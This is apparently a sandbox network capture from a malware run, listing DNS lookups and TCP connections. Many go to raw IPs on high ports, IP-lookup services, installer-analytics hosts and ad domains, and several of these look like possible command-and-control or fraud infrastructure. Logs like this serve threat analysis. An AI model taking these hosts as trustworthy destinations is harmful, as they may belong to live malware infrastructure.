BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
UA 77.123.139.190:443 api.2ip.ua tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
US 8.8.8.8:53 tbpws.top udp
KR 210.98.149.172:80 tbpws.top tcp
BR 138.36.3.134:80 securebiz.org tcp
KR 210.98.149.172:80 tbpws.top tcp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
DE 144.76.183.53:63565 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 theonlygames.com udp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 8.8.8.8:53 ln.gamesrevenue.com udp
US 204.155.147.176:443 ln.gamesrevenue.com tcp
US 204.155.147.176:443 ln.gamesrevenue.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 mc.yandex.ru udp
RU 93.158.134.119:443 mc.yandex.ru tcp
RU 93.158.134.119:443 mc.yandex.ru tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 repository.certum.pl udp
NL 104.110.191.14:80 repository.certum.pl tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 fernandomayol.com udp
MX 201.124.70.40:80 fernandomayol.com tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 yandex.ocsp-responder.com udp
RU 5.45.205.241:80 yandex.ocsp-responder.com tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 134.209.120.117:50424 tcp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
US 8.8.8.8:53 110.t.keepitpumpin.io udp
US 8.8.8.8:53 112.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 206.189.199.186:12130 tcp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
CA 68.183.198.98:44374 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.194:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 pix.lendingtree.com udp
NL 65.9.83.47:443 pix.lendingtree.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 142.251.36.34:443 googleads.g.doubleclick.net tcp
MD 5.181.156.77:80 5.181.156.77 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 jaliemaval.xyz udp
US 8.8.8.8:53 ssl.gstatic.com udp
RU 95.213.165.250:80 jaliemaval.xyz tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 172.217.168.237:443 accounts.google.com tcp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 142.251.36.1:443 tpc.googlesyndication.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 udp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 216.58.214.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.42:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
US 206.189.199.186:12130 tcp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.42:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.170:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.10:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 216.58.214.10:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 208.67.222.222:53 tcp
US 208.67.222.222:53 tcp
US 208.67.222.222:53 tcp
US 208.67.222.222:53 tcp
CN 175.25.50.87:7000 tcp
US 208.67.222.222:53 tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.67.222.222:53 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
CA 68.183.198.98:44374 tcp
US 208.67.222.222:53 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 techadsmedia.com udp
FR 51.91.200.241:443 techadsmedia.com tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:80 searchengineads.net tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 216.58.214.10:443 content-autofill.googleapis.com tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 104.21.15.206:443 tcp
US 208.67.222.222:53 tcp
US 206.189.199.186:12130 tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
